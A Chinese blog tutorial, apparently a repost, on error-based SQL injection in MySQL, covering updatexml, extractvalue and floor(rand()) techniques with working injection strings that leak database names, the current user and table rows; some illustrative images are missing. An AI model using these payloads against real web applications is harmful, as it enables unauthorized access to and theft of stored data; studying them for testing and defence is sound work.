首页 > 数据库技术 > 详细

SQL 注入 报错注入

时间:2020-04-27 14:02:42      阅读:70      评论:0      收藏:0      [点我收藏+]

报错注入的三种格式:

 

第一种:  updatexml  修改格式函数  修改格式不符合 报错

 


 

函数解释:

  UPDATEXML (XML_document, XPath_string, new_value);

  第一个参数:XML_document是String格式,第二个参数:XPath_string (Xpath格式的字符串) ,

  第三个参数:new_value,String格式,替换查找到的符合条件的数据

  而我们的注入语句为:
   select updatexml(1,concat(0x7e,(SELECT username from security.users limit 0,1),0x7e),1);

  其中的concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误,爆出
  ERROR 1105 (HY000): XPATH syntax error: ‘~Dumb~‘

 

select updatexml(1,concat(0x7e,(构造语句)),1);

 

updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1)

 

 

 

第二种  extractvalue()函数报错注入  查询函数  不符合报错


 

函数解释:
  extractvalue():从目标XML中返回包含所查询值的字符串。
  EXTRACTVALUE (XML_document, XPath_string);
  第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
  第二个参数:XPath_string (Xpath格式的字符串)
  concat:返回结果为连接参数产生的字符串。

 

 

1‘ and extractvalue(1,concat(0x7e,user(),0x7e,database())) -- //爆数据库信息

1‘  and  extractvalue(1,(构造语句))

 

 

第三种:floor()报错注入语句格式:

 


 

 

 

函数解释:
  技术分享图片

 

 

 

 

 

要求列数一致

技术分享图片

 

 

 

 

 

select   count(*),     concat(floor(rand(0)*2),database())   x from information_schema. schemata  group by x;

 

SQL 注入 报错注入

原文:https://www.cnblogs.com/xingyuner/p/12786114.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!